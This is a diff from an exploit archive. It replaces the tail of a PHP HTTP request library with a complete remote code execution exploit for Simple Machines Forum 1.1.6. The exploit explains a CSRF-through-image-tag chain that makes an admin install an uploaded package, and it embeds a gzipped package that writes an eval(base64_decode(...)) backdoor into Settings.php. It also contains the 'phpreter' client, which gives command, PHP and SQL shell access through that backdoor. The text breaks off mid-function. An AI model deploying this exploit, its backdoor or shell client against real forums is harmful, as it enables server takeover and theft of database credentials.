- * - * @access public - * @param string headern HeaderName - * @param string headervalue Headervalue - * @example $this->addheader('Client-IP', '128.5.2.3') - * - */ - function addheader($headern,$headervalue) - { - if(!isset($this->header)) - $this->header = array(); - - $this->header[$headern] = $headervalue; - } - - - /** - * This function allows you to use an - * http proxy server. Several methods - * are supported. - * - * @access public - * @param string proxy ProxyHost - * @param integer proxyp ProxyPort - * @example $this->proxy('localhost',8118) - * @example $this->proxy('localhost:8118') - * - */ - function proxy($proxy,$proxyp='') - { - if(empty($proxyp)) - { - $proxarr = explode(':',$proxy); - $this->proxyhost = $proxarr[0]; - $this->proxyport = (int)$proxarr[1]; - } - else - { - $this->proxyhost = $proxy; - $this->proxyport = (int)$proxyp; - } - - if($this->proxyport > 65535) - die("Error: Invalid port number"); - } - - - /** - * This function allows you to use an - * http proxy server which requires a - * basic authentification. Several - * methods are supported: - * - * @access public - * @param string proxyauth ProxyUser - * @param string proxypass ProxyPass - * @example $this->proxyauth('user','pwd') - * @example $this->proxyauth('user:pwd'); - * - */ - function proxyauth($proxyauth,$proxypass='') - { - if(empty($proxypass)) - { - $posvirg = strpos($proxyauth,':'); - $this->proxyuser = substr($proxyauth,0,$posvirg); - $this->proxypass = substr($proxyauth,$posvirg+1); - } - else - { - $this->proxyuser = $proxyauth; - $this->proxypass = $proxypass; - } - } - - - /** - * This function allows you to set - * the 'User-Agent' header. - * - * @access public - * @param string useragent Agent - * @example $this->agent('Firefox') - * - */ - function agent($useragent) - { - $this->addheader('User-Agent',$useragent); - } - - - /** - * This function returns the headers - * which will be in the next request. 
- * - * @access public - * @return string $this->header_str Headers - * @example $this->showheader() - * - */ - function showheader() - { - $this->header_str = ''; - - if(!isset($this->header)) - return; - - foreach($this->header as $name => $value) - $this->header_str .= $name.': '.$value."\r\n"; - - return $this->header_str; - } - - - /** - * This function returns the cookies - * which will be in the next request. - * - * @access public - * @return string $this->cookie_str Cookies - * @example $this->showcookie() - * - */ - function showcookie() - { - $this->cookie_str = ''; - - if(!isset($this->cookie)) - return; - - foreach($this->cookie as $name => $value) - $this->cookie_str .= $name.'='.$value.'; '; - - return $this->cookie_str; - } - - - /** - * This function returns the last - * formed http request. - * - * @access public - * @return string $this->packet HttpPacket - * @example $this->showlastrequest() - * - */ - function showlastrequest() - { - if(!isset($this->packet)) - return; - else - return $this->packet; - } - - - /** - * This function sends the formed - * http packet with the GET method. - * - * @access public - * @param string url Url - * @return string $this->sock() - * @example $this->url('localhost/index.php?var=x') - * @example $this->url('http://localhost:88/tst.php') - * - */ - function get($url) - { - $this->target($url); - $this->method = 'get'; - return $this->sock(); - } - - - /** - * This function sends the formed - * http packet with the POST method. - * - * @access public - * @param string url Url - * @param string data PostData - * @return string $this->sock() - * @example $this->post('http://localhost/','helo=x') - * - */ - function post($url,$data) - { - $this->target($url); - $this->method = 'post'; - $this->data = $data; - return $this->sock(); - } - - - /** - * This function sends the formed http - * packet with the POST method using - * the multipart/form-data enctype. 
- * - * @access public - * @param array array FormDataArray - * @return string $this->sock() - * @example $formdata = array( - * frmdt_url => 'http://localhost/upload.php', - * frmdt_boundary => '123456', # Optional - * 'var' => 'example', - * 'file' => array( - * frmdt_type => 'image/gif', # Optional - * frmdt_transfert => 'binary' # Optional - * frmdt_filename => 'hello.php, - * frmdt_content => '')); - * $this->formdata($formdata); - * - */ - function formdata($array) - { - $this->target($array[frmdt_url]); - $this->method = 'formdata'; - $this->data = ''; - - if(!isset($array[frmdt_boundary])) - $this->boundary = 'phpsploit'; - else - $this->boundary = $array[frmdt_boundary]; - - foreach($array as $key => $value) - { - if(!preg_match('#^frmdt_(boundary|url)#',$key)) - { - $this->data .= str_repeat('-',29).$this->boundary."\r\n"; - $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; - - if(!is_array($value)) - { - $this->data .= "\r\n\r\n".$value."\r\n"; - } - else - { - $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; - - if(isset($array[$key][frmdt_type])) - $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; - - if(isset($array[$key][frmdt_transfert])) - $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; - - $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; - } - } - } - - $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; - return $this->sock(); - } - - - /** - * This function returns the content - * of the server response, without - * the headers. 
- * - * @access public - * @param string code ServerResponse - * @return string $this->server_content - * @example $this->getcontent() - * @example $this->getcontent($this->url('http://localhost/')) - * - */ - function getcontent($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_content = ''; - - for($i=1;$iserver_content .= $code[$i]; - - return $this->server_content; - } - - - /** - * This function returns the headers - * of the server response, without - * the content. - * - * @access public - * @param string code ServerResponse - * @return string $this->server_header - * @example $this->getcontent() - * @example $this->getcontent($this->post('http://localhost/','1=2')) - * - */ - function getheader($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_header = $code[0]; - - return $this->server_header; - } - - - /** - * This function is called by the - * cookiejar() function. It adds the - * value of the "Set-Cookie" header - * in the "Cookie" header for the - * next request. You don't have to - * call it. - * - * @access private - * @param string code ServerResponse - * - */ - function getcookie() - { - foreach(explode("\r\n",$this->getheader()) as $header) - { - if(preg_match('/set-cookie/i',$header)) - { - $fequal = strpos($header,'='); - $fvirgu = strpos($header,';'); - - // 12=strlen('set-cookie: ') - $cname = substr($header,12,$fequal-12); - $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); - - $this->cookie[trim($cname)] = trim($cvalu); - } - } - } - - - /** - * This function is called by the - * get()/post() functions. You - * don't have to call it. 
- * - * @access private - * @param string urltarg Url - * @example $this->target('http://localhost/') - * - */ - function target($urltarg) - { - if(!ereg('^http://',$urltarg)) - $urltarg = 'http://'.$urltarg; - - $urlarr = parse_url($urltarg); - $this->url = 'http://'.$urlarr['host'].$urlarr['path']; - - if(isset($urlarr['query'])) - $this->url .= '?'.$urlarr['query']; - - $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; - $this->host = $urlarr['host']; - - if($this->port != '80') - $this->host .= ':'.$this->port; - - if(!isset($urlarr['path']) or empty($urlarr['path'])) - die("Error: No path precised"); - - $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); - - if($this->port > 65535) - die("Error: Invalid port number"); - } - - - /** - * If you call this function, - * the script will extract all - * 'Set-Cookie' headers values - * and it will automatically add - * them into the 'Cookie' header - * for all next requests. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->cookiejar(0) - * @example $this->cookiejar(1) - * - */ - function cookiejar($code) - { - if($code=='0') - $this->cookiejar=FALSE; - - elseif($code=='1') - $this->cookiejar=TRUE; - } - - - /** - * If you call this function, - * the script will follow all - * redirections sent by the server. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->allowredirection(0) - * @example $this->allowredirection(1) - * - */ - function allowredirection($code) - { - if($code=='0') - $this->allowredirection=FALSE; - - elseif($code=='1') - $this->allowredirection=TRUE; - } - - - /** - * This function is called if - * allowredirection() is enabled. - * You don't have to call it. 
- * - * @access private - * @return string $this->url('http://'.$this->host.$this->path.$this->last_redirection) - * @return string $this->url($this->last_redirection) - * @return string $this->recv; - * - */ - function getredirection() - { - if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) - { - $this->last_redirection = trim($codearr[2]); - - if(!ereg('://',$this->last_redirection)) - return $this->url('http://'.$this->host.$this->path.$this->last_redirection); - - else - return $this->url($this->last_redirection); - } - else - return $this->recv; - } - - - /** - * This function allows you - * to reset some parameters. - * - * @access public - * @param string func Param - * @example $this->reset('header') - * @example $this->reset('cookie') - * @example $this->reset() - * - */ - function reset($func='') - { - switch($func) - { - case 'header': - $this->header = array(); - break; - - case 'cookie': - $this->cookie = array(); - break; - - default: - $this->cookiejar = ''; - $this->header = array(); - $this->cookie = array(); - $this->allowredirection = ''; - break; - } - } -} - -?> - -# milw0rm.com [2008-11-04] + +# URL: http://real.olympe-network.com/ +# +# Note: other versions are maybe vulnerable, not tested. +# +# SMF suffers from multiples vulnerabilities. +# Combining some of them, we can obtain a remote code execution on the +# remote host. I won't talk here about all of them, but I'll explain +# how we can execute code. +# +# 0 - UPDATE (05/11/08) +# +# (Now,) SMF seems to replace "action=" by "action-" in every URL. +# But SMF urldecode() GET data, so I replaced "action" by "%61ction". +# Other little problems have been corrected. +# +# Thanks to Alessandro Tagliapietra for his report and his patience. 
+# +# It seems that many people can't use phpreter, so here is a little course : +# +# phpreter have 3 modes : cmd (bash), php, and SQL +# +# To switch to a mode just type "mode=" (replace by php, cmd or sql) +# +# In cmd mode, you can run bash commands, like "ls" +# In php mode, you can exec php code like "echo 'abc';" +# In sql mode, you can exec sql queries and view results, try "SHOW TABLES" +# +# I - Session Code +# +# SMF administration panel is secured by a "session code", a kind of +# password that must be provided by the admin browser when the admin +# is editing data. +# +# But the session code is not required for SMF package installation. +# Just to be clear : you don't need the "session code" to install the +# package, but you do need a valid admin session. +# +# II - Package Installation +# +# Package installation works this way : +# - The admin tells an archive file, which can be either gzip or zip, to SMF +# - SMF un(g)zip it, and analyse the XML files (yes, it work with XML) +# to add, replace or remove code from any SMF source code file. +# +# To precise an archive to SMF, the admin is supposed to go on this URL : +# +# http://[website]/SMF/index.php?action=packages;sa=install2;package=[filename] (1) +# +# Since $_REQUEST['package'] is not checked, we can install any file +# on the server, even if the file is not in the Packages/ dir. +# +# Using CSRF, we can make an admin to install whatever package we want. +# That does not seem really interesting for now, but be patient =) +# +# III - File upload in SMF; Attachments +# +# SMF let users upload files in two cases : +# - You can upload an image to be your avatar +# - You can upload attachments to every post you submit +# +# Since uploaded images are checked, they don't interest us for now. +# +# Attachments are not checked by SMF. +# They are renamed and moved to the attachments/ directory. 
+# They are renamed this way : +# [id]_[name]_[ext][md5([name].[ext])] +# +# As you can see, there is no rand(), or other strange stuff : +# we can easily find attachment name. +# +# The second part is more interesting now, no ? +# +# Now, we can submit a post with a gzip'ed attachment, and make the admin +# click on a specific link, to install a package we uploaded ourself. +# +# I writed "click", so many of you may say "brr, that sucks". +# So here come the wait-I've-not-finished part. +# +# IV - Wait-I've-not-finished part +# +# SMF allows us to display remote images in our posts, using [img][/img] +# We can just set our image URL to ... (1) : when the admin will see our post, +# the package will be installed. +# +# V - Classic Scenario +# +# 1. We submit a fantastic post containing our nasty-attached-gzip'ed package, ready +# to be installed. +# 2. We guess the attachment name, that's pretty easy because we can retrieve the +# attachment ID. +# 3. We modify our post, adding an [img](1)[/img], replacing [filename] by +# ../attachments/[the_name_you_just_found] +# 4. The administrator discover our fantastic post on his fantastic forum ... +# 5. His browser discovers our image : it goes to the specified url to download it. +# wooops. The package is installed. +# +# VI - Exploit +# +# The exploit will login with your user account, and submit a new post/topic containing an +# attachment, a gzipped package, which permits remote code execution once installed. +# Then it will obtain the attachment ID, determine attachment name, and modify your topic to +# add a remote image (using [img][/img]). +# Then you'll have to wait for an admin to see your post ... and the package will be installed. +# +# VII - Notes +# +# - Do not forget to change SUBJECT and MESSAGE constants, to make your post a little more realistic. +# - The current gzipped package is supposed to put PHP code at the end of Settings.php file. 
+# - Code: if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); } +# +# First run the exploit like this : +# eg : php exploit.php -url http://localhost/forum/ -bid 2 -user tester:passwd +# And when you think the admin viewed your post, run the shell :) +# eg : php exploit.php -url http://localhost/forum/ -shell +# +# FOR EDUCATIONAL PURPOSE ONLY +# + +new smf_poc(); + +class smf_poc +{ + const SUBJECT = 'hello'; + const MESSAGE = 'dudes ... I love your forum ;)'; + + function smf_poc() + { + $this->header(); + $this->gzip(); + $this->loadparameters(); + $this->wwwinit(); + + if(!$this->shell) + { + # First of all, login + $this->login(); + # Then submit a topic + $this->submit_post(); + # Find attachment name and message id + $this->get_postinfo(); + # and modify the post + $this->edit_post(); + # finally ... wait. + $this->wait(); + } + else + $this->shell(); + } + + function header() + { + $this->msg(); + $this->msg(' Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit'); + $this->msg(' by Charles FOL '); + $this->msg(); + } + + function msg($msg = '', $exit = 0) + { + print '# ' . $msg . "\n"; + + if($exit) + { + $this->msg(); + exit(); + } + } + + function usage() + { + global $argv; + + $name = basename($argv[0]); + + $this->msg('usage : php ' . $name . ' -url [url] -bid [bid] -user [user]:[passwd]'); + $this->msg(' OR php ' . $name . ' -url [url] -shell'); + $this->msg(); + $this->msg('Parameters are :'); + $this->msg(' -shell Test if the shell is installed, and load phpreter'); + $this->msg(' -bid (int) The board ID were you want to submit the topic'); + $this->msg(' -user user:passwd A valid user:password couple'); + $this->msg(' -wait Flood control time (default: 5)'); + $this->msg(); + $this->msg('eg : php ' . $name . 
' -url http://localhost/forum/ -bid 2 -user tester:passwd', 1); + } + + # Get every needed parameters, and load defaults + function loadparameters() + { + $this->furl = $this->getparameter('url'); + $this->shell = $this->getoption('shell'); + $this->wait = $this->getparameter('wait', 5); + + if(!$this->shell) + { + $this->bid = $this->getparameter('bid'); + $this->user = $this->getparameter('user'); + } + } + + # Patience ... + function wait() + { + $this->url->topic = $this->pid; + $this->makeurl(); + + $this->msg(); + $this->msg('Now, you just have to wait for an admin to see your post,'); + $this->msg('then you will be able to launch a shell using -shell.'); + $this->msg(); + $this->msg('Post URL : ' . $this->murl, 1); + } + + # Check if a shell is available and launch phpreter + function shell() + { + $this->www->addheader('Shell', 'MTs='); + + $this->url->action = 'forum'; + $this->get(); + + if(!$this->match('(12345678901234567890)')) + $this->msg('Shell is not available', -1); + + $sql = array + ( + 'var_host' => '$db_server', + 'var_user' => '$db_user', + 'var_passwd' => '$db_passwd', + 'var_db' => '$db_name' + ); + + $preter = new phpreter($this->murl, '1234567890(.*)1234567890', 'cmd', $sql); + } + + function wwwinit() + { + $this->www = new phpsploit(); + $this->www->cookiejar(1); + $this->www->addheader('Referer', $this->furl . 'index.php'); + } + + # Log in ... + function login() + { + $user = explode(':', $this->user); + + $this->url = 'action=login2'; + $this->data = 'user='.$user[0].'&passwrd='.$user[1].'&cookielength=-1'; + $this->post(); + + $this->location->action = 'login2'; + $this->location->sa = 'check'; + + if($this->location()) + $this->msg('Logged in as ' . 
$user[0]); + else + $this->msg('Can\'t log in', 1); + } + + # Get seqnum and sescode + function get_sessionvars() + { + $this->get(); + + $this->scode = $this->match('name="sc" value="([0-9a-f]+)"', 1); + $this->sqnum = $this->match('name="seqnum" value="([0-9]+)"', 1); + } + + # Submit our post, containing our gzipped package + function submit_post() + { + # Flood control: let's sleep a little + + $this->msg('Waiting ' . $this->wait . ' secs (flood control)'); + sleep($this->wait); + + # Obtain session vars + + $this->url->action = 'post'; + $this->url->board = $this->bid . '.0'; + + $this->get_sessionvars(); + + # and submit the post + + $this->url->action = 'post2'; + $this->url->board = $this->bid; + $this->url->start = '0'; + + $this->data = array + ( + 'subject' => self::SUBJECT, + 'message' => self::MESSAGE, + 'sc' => $this->scode, + 'seqnum' => $this->sqnum, + 'icon' => 'xx', + 'topic' => 0, + 'notify' => 0, + 'lock' => 0, + 'sticky' => 0, + 'move' => 0, + 'additional_options' => 0, + 'attachment[]' => array + ( + frmdt_filename => 'jpeg.jpg', + frmdt_type => 'image/jpeg', + frmdt_content => $this->GZIP, + ) + ); + + $this->post(); + + # Check the submission + + $this->location->board = $this->bid; + + if($this->location()) + { + $this->msg('Post successfully submitted'); + } + else + { + $this->msg('Error while posting'); + $this->msg('Try augmenting -wait parameter', 1); + } + + # Find the post id + + $this->url->board = $this->bid . '.0'; + $this->get(); + + $this->pid = $this->match('topic=([0-9]+)'); + $this->pid = max($this->pid); + } + + # Get the avatar ID to obtain its full name, and get msg id + function get_postinfo() + { + $this->url->topic = $this->pid . 
'.0'; + $this->get(); + + $this->aid = $this->match('attach=([0-9]+)', 1); + $this->mid = $this->match('msg=([0-9]+)', 1); + + if($this->aid) + $this->msg('Got attachment name =)'); + else + $this->msg('Unable to obtain attachment ID ...', 1); + + if(!$this->mid) + $this->msg('Unable to obtain message ID ...', 1); + } + + # Edit our precedent post : just add our "image". + function edit_post() + { + # Obtain session vars + + $this->url->action = 'post'; + $this->url->topic = $this->pid; + $this->url->msg = $this->mid; + $this->url->sesc = $this->scode; + + $this->get_sessionvars(); + + # Build our CSRF + + $this->url->{'%61ction'} = 'packages'; + $this->url->sa = 'install2'; + $this->url->package = $this->aid . '_jpeg_jpg' . md5('jpeg.jpg'); + $this->url->package = '../attachments/' . $this->url->package; + + $this->makeurl(); + + $img = '[img]' . $this->murl . '[/img]'; + + # Edit the post + + $this->url->action = 'post2'; + $this->url->sesc = $this->scode; + $this->url->board = $this->bid; + $this->url->msg = $this->mid; + $this->url->start = 0; + + $this->data = array + ( + 'topic' => $this->pid, + 'subject' => self::SUBJECT, + 'icon' => 'xx', + 'message' => self::MESSAGE . $img, + 'notify' => '0', + 'lock' => '0', + 'goback' => '1', + 'sticky' => '0', + 'move' => '0', + 'attach_del[]' => '0', + 'attach_del[]' => $this->aid, + 'post' => 'Save', + 'num_replies' => '0', + 'additional_options' => '0', + 'sc' => $this->scode, + 'seqnum' => $this->sqnum, + ); + + $this->post(); + + if($this->location(';topic=' . $this->pid)) + $this->msg('Post successfully edited, everything done.'); + else + $this->msg('Unable to edit the post'); + } + + # Find were we are redirected to + function location() + { + # SMF likes making a mess with URL, so ... let's consider + # all cases. + + $expr = ''; + + $this->location = (array) $this->location; + + foreach($this->location as $key => $value) + { + $expr .= $key . '[,=]' . urlencode($value) . 
'(&|;|%26|%3B)'; + } + + $this->location = null; + + $expr = substr($expr, 0, -13); + $expr = '#(Refresh|Location):.*' . $expr . '#i'; + + $head = $this->www->getheader(); + + return preg_match($expr, $head); + } + + function match($expr, $one = 0) + { + # SMF likes making a mess with URL, so ... let's consider + # all cases. + + $expr = str_replace('\?', '[\?/]', $expr); + $expr = str_replace('=', '[,=]', $expr); + $expr = str_replace(';', '(&|;|%26|%3B)', $expr, $count); + $expr = '#' . $expr . '#is'; + + $count++; + + $http = $this->www->getcontent(); + + if(!$one && !preg_match_all($expr, $http, $match)) + return false; + + if($one && !preg_match($expr, $http, $match)) + return false; + + return $match[$count]; + } + + function getoption($option) + { + global $argv, $argc; + + foreach($argv as $arg) + { + if($arg == '-' . $option) + return true; + } + + return false; + } + + function getparameter($parameter, $default = false) + { + global $argv, $argc; + + for($i=0;$i<$argc;$i++) + { + if($argv[$i] == '-' . $parameter) + return $argv[$i+1]; + } + + if($default === false) + $this->usage(); + + return $default; + } + + function get() + { + $this->makeurl(); + $this->www->get($this->murl); + } + + function post() + { + $this->makeurl(); + + if(is_array($this->data)) + { + $this->data['frmdt_url'] = $this->murl; + + $this->www->formdata($this->data); + } + else + $this->www->post($this->murl, $this->data); + } + + # Construct a valid URL using the url object/string. + function makeurl() + { + $url = ''; + + if(is_object($this->url)) + { + $url = ''; + + $this->url = (array) $this->url; + + foreach($this->url as $key => $value) + { + $url .= $key . '=' . urlencode($value) . '&'; + } + + $url = substr($url, 0, -1); + } + else + $url = $this->url; + + $url = $this->furl . 'index.php?' . $url; + + $this->murl = $url; + + $this->url = null; + } + + # Our SMF package ... + function gzip() + { + $this->GZIP = '' + . 
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x0b\xed\x56\xff\x4f" + . "\xda\x40\x14\xe7\x57\x4c\xfc\x1f\x9e\x64\x89\x98\x08\x6d" + . "\x01\xcb\x86\xa5\xc6\x29\x8b\x26\x7e\x8b\x34\x4b\x8c\x31" + . "\xe4\xa0\x87\xdc\x6c\xef\x9a\xde\x21\x92\x65\xff\xfb\xde" + . "\x5d\x71\x52\xdd\x37\x12\x37\x17\xc7\xa3\x69\xb9\xbb\xf7" + . "\x5e\xdf\xd7\xcf\x2b\xe3\x52\x91\x28\xaa\xde\xc5\x51\xe1" + . "\x4f\x91\x63\xdb\xae\xeb\x42\xc1\x36\xf4\xf0\x84\x8c\x6a" + . "\x8d\xad\x26\x38\x8e\x63\xd7\xeb\x76\xdd\x6d\xd6\x00\x1c" + . "\xdb\x6d\x3a\x50\xf8\x2b\x34\x46\xff\x53\x34\x29\x15\x42" + . "\x15\xfe\x3f\xf2\x76\x30\xf3\x70\x4b\x53\xc9\x04\x6f\x97" + . "\x9c\xaa\x5d\xda\xf1\x57\x57\xbc\xb5\xfd\xd3\xbd\xe0\xe2" + . "\xac\x03\xb1\x08\xd9\x90\x0d\x88\xc2\x73\xe8\x5e\x74\x83" + . "\xce\x31\x94\x46\x4a\x25\x2d\xcb\x9a\x4c\x26\x55\xc9\xe2" + . "\x24\xa2\x31\x19\x8c\x18\xa7\xb2\x2a\xd2\x6b\x0b\x35\x5a" + . "\xf3\x62\x25\xa3\xb0\x52\x81\x67\xfc\xad\xae\x14\x83\x11" + . "\x93\x80\x17\xe1\x40\xef\x88\xb6\x22\x6f\xec\x90\xe1\xce" + . "\x50\xa4\xd0\x3d\xfe\x00\x09\x19\xdc\x90\x6b\x34\x70\x75" + . "\x05\x45\x77\x83\xa0\x73\x12\x1c\x9e\x9e\xb4\xe0\x70\x08" + . "\x53\x31\x06\x92\x52\x50\xe9\x94\xf1\x6b\x50\x02\x58\xd6" + . "\x15\xa0\xf4\x2b\x62\xc2\xc7\xb8\x98\x6e\x1a\x46\x39\x12" + . "\xe3\x28\xd4\xbc\xa8\x47\x8d\xe8\xbd\x66\xcd\x86\x8f\xb4" + . "\x0a\x5a\x25\x53\x30\x61\xa8\x80\x0b\xfc\x23\xd2\x1b\x63" + . "\x07\x8a\x6f\x02\x9a\x49\x24\xbe\x8b\xdc\x50\x20\x10\x09" + . "\x71\x83\x7a\x88\x02\xad\x6a\x28\xa2\x48\x4c\xb4\x0d\x9a" + . "\x9d\x71\xbc\xc7\x99\x2f\x78\x19\x5b\xb2\x9d\x16\x8a\x14" + . "\x67\x39\x40\x97\xe5\xf7\x92\x10\x8a\x81\xb4\x32\xd3\x2b" + . "\x33\x77\xaa\xc9\x28\xd1\xee\xb7\x9f\x99\x4c\x48\x8f\x1f" + . "\x87\x5e\xc2\x00\x33\xd3\xa7\x30\x96\x34\xd4\x41\x35\xc9" + . "\x99\xce\xce\xa4\x40\x87\x32\xb7\xa7\x10\x0a\x98\xe0\x02" + . "\xb5\x60\x88\xd2\x6f\x11\xe5\x94\x86\x52\x73\xc4\x5a\x1c" + . "\x99\xf0\x6e\x82\x99\xa4\x22\xa1\x69\x34\x35\xc9\x84\x67" + . 
"\xad\xab\x8a\xaf\x75\x7a\xb9\x42\xc2\x7a\xe6\xb2\xbd\x68" + . "\xd1\x67\x62\x2d\x19\x0f\x7f\x25\xaa\xfb\xa3\x68\x1a\x24" + . "\x2b\xe9\xb9\xbc\xcf\x42\x20\x74\x1c\x75\x85\x48\x12\x63" + . "\xd9\xc8\x2c\x76\x8c\xc3\x5c\x01\x56\xb4\x9c\xc6\xf1\x6a" + . "\xe6\x45\xd1\x63\xa1\xdf\x27\xfd\x4f\x63\xc9\x5a\x7d\xc2" + . "\x39\x0d\x7b\x31\x8d\xfb\xd8\xea\x3d\x72\x4b\x10\xf5\x3c" + . "\x0b\x39\x34\xe3\xac\xfd\x7d\xbb\xea\x78\xd6\xfd\xc2\x64" + . "\xd5\x33\x4d\xc4\xf1\xad\xed\x52\x97\x2a\x85\xb5\x29\x75" + . "\x19\x19\x93\x8b\x9e\x4e\x83\x31\xd4\x2c\x8b\x9e\xa4\x24" + . "\x1d\x8c\x20\x11\x92\x29\x83\x27\x94\x87\x25\xb0\x66\xa7" + . "\x24\x0c\x7d\x6f\xed\x72\x6f\x7f\x37\xd8\xbd\x34\x5b\x6c" + . "\x58\x66\x52\x52\x55\x7e\xd3\xeb\x76\xce\x3f\x76\xce\x2f" + . "\xd7\x0f\x82\xe0\xac\xd7\x3d\xe8\x1c\x1d\xad\x5f\x6d\x6c" + . "\xc0\x67\x4c\x36\xe3\x0a\x9c\x5a\xbd\xb1\xe5\x36\xdf\xbe" + . "\xb3\xb7\xe9\x2d\x89\xca\x7d\x6c\x22\xb7\xd1\x0b\xe9\x40" + . "\x84\xf4\x87\xe2\xdb\x4f\x85\xef\x98\x2a\x6f\x6c\xc3\x97" + . "\xab\x2b\xdf\xb3\xb4\x45\xc6\x11\x2b\xe7\x89\x67\x69\xb7" + . "\x35\x6a\xe5\x52\x8a\x1b\xaf\x0e\xff\x1f\x17\xcf\x0b\xcc" + . "\x7f\x70\xdd\x7a\x36\xff\x1d\xd7\x75\xec\x06\xce\x7f\x67" + . "\xab\xb6\x9c\xff\xff\xc6\xfc\x9f\x2f\x90\x05\xe6\xff\xbc" + . "\x98\x99\xff\x39\x3d\xbf\x8d\xa8\x39\x35\x8b\x22\xaa\x86" + . "\x2d\xff\xbd\x41\x3e\x98\x21\x1f\xdc\x23\x9f\x39\x5b\x08" + . "\x24\xd5\x34\xa1\xfe\x3c\x1c\x78\x96\xd9\xfa\x09\x80\xa2" + . "\xf6\x6c\xf2\x66\x20\x93\xc3\x12\xf6\xf0\xe1\xfd\x04\x65" + . "\x10\x80\x1e\x04\xbd\x5c\x10\x5e\x23\x06\x2d\x69\x49\x4b" + . 
"\x7a\x19\xfa\x0a\x12\x1a\xc6\x57\x00\x10\x00\x00"; + } +} + +/* + * Copyright (c) Charles FOL + * + * TITLE: PHPreter + * AUTHOR: Charles FOL + * VERSION: 1.3 + * LICENSE: GNU General Public License + * + */ + +class phpreter +{ + var $url; + var $host; + var $port; + var $page; + + var $mode; + + var $ssql; + + var $prompt; + var $phost; + + var $expr; + var $data; + + /** + * __construct() + * + * @param url The url of the remote shell. + * @param expr The regular expression to catch cmd result. + * @param mode Mode: php, sql or cmd. + * @param sql An array with the file to include, + * and sql vars + * @param clear Determines if clear() is called + * on startup + */ + function phpreter($url, $expr='^(.*)$', $mode='cmd', $sql=array(), $clear=false) + { + $this->url = $url; + $this->expr = '#' . $expr . '#is'; + + # + # Set data + # + + $infos = parse_url($this->url); + $this->host = $infos['host']; + $this->port = isset($infos['port']) ? $infos['port'] : 80; + $this->page = $infos['path']; + + # www.(site).com + $host_tmp = explode('.', $this->host); + $this->phost = $host_tmp[ count($host_tmp)-2 ]; + + # Set up MySQL connection string + $this->set_ssql($sql); + + # Switch to default mode + $this->setmode($mode); + + # + # Main Loop + # + + if($clear) + $this->clear(); + + print $this->prompt; + + while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) ) + { + # change mode + if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i', $cmd, $array)) + $this->setmode($array[3]); + + # clear data + elseif(preg_match('#^clear$#i', $cmd)) + $this->clear(); + + # else + else print $this->exec($cmd); + + print $this->prompt; + } + } + + /** + * set_ssql() + * Build $ssql var + */ + function set_ssql($sql) + { + $this->ssql = ''; + + $sql = (object) $sql; + + # is there something to include ? + + if(isset($sql->include)) + $this->ssql .= 'include(\'' . $sql->include . 
'\');'; + + # mysql_connect: host, user, passwd + + $this->ssql .= 'mysql_connect('; + + foreach(array('host', 'user', 'passwd') as $key) + { + if(isset($sql->{'var_' . $key})) + { + $this->ssql .= $sql->{'var_' . $key} . ','; + } + else + { + $this->ssql .= "'" . $sql->{$key} . "',"; + } + } + + $this->ssql = substr($this->ssql, 0, -1); + $this->ssql .= ');'; + + # mysql_select_db + + if(isset($sql->var_db)) + $this->ssql .= 'mysql_select_db(' . $sql->var_db . ');'; + elseif(isset($sql->db)) + $this->ssql .= 'mysql_select_db(\'' . $sql->db . '\');'; + + # basic display for mysql results + + $this->ssql .= '$s=str_repeat(\'-\',50)."\n";'; + $this->ssql .= '$q=mysql_query(\'\') or print($s.mysql_error()."\n");'; + $this->ssql .= 'print $s;'; + $this->ssql .= 'if($q)'; + $this->ssql .= '{'; + $this->ssql .= 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'; + $this->ssql .= '{'; + $this->ssql .= 'foreach($r as $k=>$v) print " ".$k.str_repeat(\' \', 20-strlen($k))."| $v\n";'; + $this->ssql .= 'print $s;'; + $this->ssql .= '}'; + $this->ssql .= '}'; + } + + /** + * clear() + * Clear ouput, printing "\n"x50 + */ + function clear() + { + print str_repeat("\n", 50); + return 0; + } + + /** + * setmode() + * Set mode (PHP, CMD, SQL) + */ + function setmode($newmode) + { + $this->mode = strtolower($newmode); + $this->prompt = '['.$this->phost.']['.$this->mode.']# '; + + switch($this->mode) + { + case 'cmd': + $this->data = 'system(\'\');'; + break; + case 'php': + $this->data = ''; + break; + case 'sql': + $this->data = $this->ssql; + break; + } + + return $this->mode; + } + + /** + * exec() + * Execute any query and catch the result. + */ + function exec($cmd) + { + if($this->data != '') + $shell = str_replace('', addslashes($cmd), $this->data); + else + $shell = $cmd; + + $shell = base64_encode($shell); + + $packet = "GET " . $this->page . " HTTP/1.1\r\n"; + $packet .= "Host: " . $this->host . ( $this->port != 80 ? ':' . $this->port : '' ) . 
